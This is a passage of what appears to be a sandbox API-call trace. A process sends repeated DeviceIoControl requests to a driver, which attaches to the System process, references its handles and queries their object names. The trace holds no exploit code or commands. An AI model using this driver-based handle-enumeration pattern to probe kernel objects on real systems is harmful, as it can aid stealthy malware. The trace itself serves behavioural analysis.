lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x88, lpOverlapped=0x0) returned 1 [0256.695] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.695] PsAcquireProcessExitSynchronization () returned 0x0 [0256.695] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.695] ObReferenceObjectByHandle (in: Handle=0xffffffff800000dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069290a20, HandleInformation=0x0) returned 0x0 [0256.696] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.696] PsReleaseProcessExitSynchronization () returned 0x2 [0256.696] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa93 [0256.696] ObQueryNameString (in: Object=0xffffe00069290a20, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.696] ObfDereferenceObject (Object=0xffffe00069290a20) returned 0x8000 [0256.696] IoCompleteRequest () returned 0x0 [0256.696] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0256.696] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.696] PsAcquireProcessExitSynchronization () returned 0x0 [0256.696] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.696] ObReferenceObjectByHandle (in: Handle=0xffffffff80000174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00147d56970, HandleInformation=0x0) returned 0x0 [0256.696] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.696] PsReleaseProcessExitSynchronization () returned 0x2 [0256.696] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa92 [0256.696] ObQueryNameString (in: Object=0xffffc00147d56970, ObjectNameInfo=0xffffe0006a50f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a50f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.696] ObfDereferenceObject (Object=0xffffc00147d56970) returned 0x7fea [0256.696] IoCompleteRequest () returned 0x0 [0256.696] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x52, lpOverlapped=0x0) returned 1 [0256.696] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.696] PsAcquireProcessExitSynchronization () returned 0x0 [0256.696] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.696] ObReferenceObjectByHandle (in: Handle=0xffffffff80000184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000692af930, HandleInformation=0x0) returned 0x0 [0256.696] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.696] PsReleaseProcessExitSynchronization () returned 0x2 [0256.696] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa91 [0256.696] ObQueryNameString (in: Object=0xffffe000692af930, ObjectNameInfo=0xffffe0006a6fa7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6fa7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.696] ObfDereferenceObject (Object=0xffffe000692af930) returned 0x7ff9 [0256.696] IoCompleteRequest () returned 0x0 [0256.696] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x4a, lpOverlapped=0x0) returned 1 [0256.696] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.696] PsAcquireProcessExitSynchronization () returned 0x0 [0256.696] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.696] ObReferenceObjectByHandle (in: Handle=0xffffffff80000194, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069330090, HandleInformation=0x0) returned 0x0 [0256.696] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.696] PsReleaseProcessExitSynchronization () returned 0x2 [0256.696] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa90 [0256.696] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.696] ObfDereferenceObject (Object=0xffffe00069330090) returned 0x7f18 [0256.696] IoCompleteRequest () returned 0x0 [0256.697] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x52, lpOverlapped=0x0) returned 1 [0256.697] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.697] PsAcquireProcessExitSynchronization () returned 0x0 [0256.697] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.697] ObReferenceObjectByHandle (in: Handle=0xffffffff80000198, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069330290, HandleInformation=0x0) returned 0x0 [0256.697] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.697] PsReleaseProcessExitSynchronization () returned 0x2 [0256.697] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa8f [0256.697] ObQueryNameString (in: Object=0xffffe00069330290, ObjectNameInfo=0xffffe0006a6ff7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6ff7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.697] ObfDereferenceObject (Object=0xffffe00069330290) returned 0x7ffa [0256.697] IoCompleteRequest () returned 0x0 [0256.697] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x84, lpOverlapped=0x0) returned 1 [0256.697] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.697] PsAcquireProcessExitSynchronization () returned 0x0 [0256.697] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.697] ObReferenceObjectByHandle (in: Handle=0xffffffff800001b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069347de0, HandleInformation=0x0) returned 0x0 [0256.697] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.697] PsReleaseProcessExitSynchronization () returned 0x2 [0256.697] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa8e [0256.697] ObQueryNameString (in: Object=0xffffe00069347de0, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.697] ObfDereferenceObject (Object=0xffffe00069347de0) returned 0x7ff3 [0256.697] IoCompleteRequest () returned 0x0 [0256.697] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xa2, lpOverlapped=0x0) returned 1 [0256.697] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.697] PsAcquireProcessExitSynchronization () returned 0x0 [0256.697] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.697] ObReferenceObjectByHandle (in: Handle=0xffffffff800001b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006dd2baa0, HandleInformation=0x0) returned 0x0 [0256.697] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.697] PsReleaseProcessExitSynchronization () returned 0x2 [0256.697] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa8d [0256.697] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.697] ObfDereferenceObject (Object=0xffffe0006dd2baa0) returned 0x8014 [0256.697] IoCompleteRequest () returned 0x0 [0256.697] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x8a, lpOverlapped=0x0) returned 1 [0256.697] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.697] PsAcquireProcessExitSynchronization () returned 0x0 [0256.697] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.697] ObReferenceObjectByHandle (in: Handle=0xffffffff800001b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006957a750, HandleInformation=0x0) returned 0x0 [0256.697] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.697] PsReleaseProcessExitSynchronization () returned 0x2 [0256.697] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa8c [0256.697] ObQueryNameString (in: Object=0xffffe0006957a750, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.698] ObfDereferenceObject (Object=0xffffe0006957a750) returned 0x8000 [0256.698] IoCompleteRequest () returned 0x0 [0256.698] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x84, lpOverlapped=0x0) returned 1 [0256.698] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.698] PsAcquireProcessExitSynchronization () returned 0x0 [0256.698] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.698] ObReferenceObjectByHandle (in: Handle=0xffffffff800001c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069341760, HandleInformation=0x0) returned 0x0 [0256.698] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.698] PsReleaseProcessExitSynchronization () returned 0x2 [0256.698] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa8b [0256.698] ObQueryNameString (in: Object=0xffffe00069341760, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.698] ObfDereferenceObject (Object=0xffffe00069341760) returned 0x7ffd [0256.698] IoCompleteRequest () returned 0x0 [0256.698] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7a, lpOverlapped=0x0) returned 1 [0256.698] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.698] PsAcquireProcessExitSynchronization () returned 0x0 [0256.698] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.698] ObReferenceObjectByHandle (in: Handle=0xffffffff800001c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069332600, HandleInformation=0x0) returned 0x0 [0256.698] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.698] PsReleaseProcessExitSynchronization () returned 0x2 [0256.698] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa8a [0256.698] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.698] ObfDereferenceObject (Object=0xffffe00069332600) returned 0x7f1d [0256.698] IoCompleteRequest () returned 0x0 [0256.698] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0256.698] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.698] PsAcquireProcessExitSynchronization () returned 0x0 [0256.698] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.698] ObReferenceObjectByHandle (in: Handle=0xffffffff800001c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069101830, HandleInformation=0x0) returned 0x0 [0256.698] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.698] PsReleaseProcessExitSynchronization () returned 0x2 [0256.698] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa89 [0256.698] ObQueryNameString (in: Object=0xffffe00069101830, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.698] ObfDereferenceObject (Object=0xffffe00069101830) returned 0x8000 [0256.698] IoCompleteRequest () returned 0x0 [0256.698] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x26, lpOverlapped=0x0) returned 1 [0256.698] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.698] PsAcquireProcessExitSynchronization () returned 0x0 [0256.699] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.699] ObReferenceObjectByHandle (in: Handle=0xffffffff80000240, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000693c9240, HandleInformation=0x0) returned 0x0 [0256.699] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.699] PsReleaseProcessExitSynchronization () returned 0x2 [0256.699] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa88 [0256.699] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.699] ObfDereferenceObject (Object=0xffffe000693c9240) returned 0x8000 [0256.699] IoCompleteRequest () returned 0x0 [0256.699] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xa8, lpOverlapped=0x0) returned 1 [0256.699] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.699] PsAcquireProcessExitSynchronization () returned 0x0 [0256.699] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.699] ObReferenceObjectByHandle (in: Handle=0xffffffff8000024c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069436980, HandleInformation=0x0) returned 0x0 [0256.699] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.699] PsReleaseProcessExitSynchronization () returned 0x2 [0256.699] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa87 [0256.699] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.699] ObfDereferenceObject (Object=0xffffe00069436980) returned 0x8009 [0256.699] IoCompleteRequest () returned 0x0 [0256.699] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xb8, lpOverlapped=0x0) returned 1 [0256.699] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.699] PsAcquireProcessExitSynchronization () returned 0x0 [0256.699] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.699] ObReferenceObjectByHandle (in: Handle=0xffffffff80000250, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069437e50, HandleInformation=0x0) returned 0x0 [0256.699] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.700] PsReleaseProcessExitSynchronization () returned 0x2 [0256.700] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa86 [0256.700] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.700] ObfDereferenceObject (Object=0xffffe00069437e50) returned 0x800c [0256.700] IoCompleteRequest () returned 0x0 [0256.700] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xbc, lpOverlapped=0x0) returned 1 [0256.700] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.700] PsAcquireProcessExitSynchronization () returned 0x0 [0256.700] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.700] ObReferenceObjectByHandle (in: Handle=0xffffffff80000254, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006e7fc810, HandleInformation=0x0) returned 0x0 [0256.700] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.700] PsReleaseProcessExitSynchronization () returned 0x2 [0256.700] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa85 [0256.700] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.700] ObfDereferenceObject (Object=0xffffe0006e7fc810) returned 0x7ff4 [0256.700] IoCompleteRequest () returned 0x0 [0256.700] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x76, lpOverlapped=0x0) returned 1 [0256.700] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.700] PsAcquireProcessExitSynchronization () returned 0x0 [0256.700] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.700] ObReferenceObjectByHandle (in: Handle=0xffffffff80000258, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069538180, HandleInformation=0x0) returned 0x0 [0256.700] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.700] PsReleaseProcessExitSynchronization () returned 0x2 [0256.700] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa84 [0256.700] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.700] ObfDereferenceObject (Object=0xffffe00069538180) returned 0x7f1f [0256.700] IoCompleteRequest () returned 0x0 [0256.700] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x86, lpOverlapped=0x0) returned 1 [0256.700] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.700] PsAcquireProcessExitSynchronization () returned 0x0 [0256.700] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.700] ObReferenceObjectByHandle (in: Handle=0xffffffff80000260, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006934a820, HandleInformation=0x0) returned 0x0 [0256.700] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.700] PsReleaseProcessExitSynchronization () returned 0x2 [0256.700] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa83 [0256.700] ObQueryNameString (in: Object=0xffffe0006934a820, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.700] ObfDereferenceObject (Object=0xffffe0006934a820) returned 0x8000 [0256.700] IoCompleteRequest () returned 0x0 [0256.701] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xa0, lpOverlapped=0x0) returned 1 [0256.701] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.701] PsAcquireProcessExitSynchronization () returned 0x0 [0256.701] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.701] ObReferenceObjectByHandle (in: Handle=0xffffffff80000274, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000694b9390, HandleInformation=0x0) returned 0x0 [0256.701] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.701] PsReleaseProcessExitSynchronization () returned 0x2 [0256.701] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa82 [0256.701] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.701] 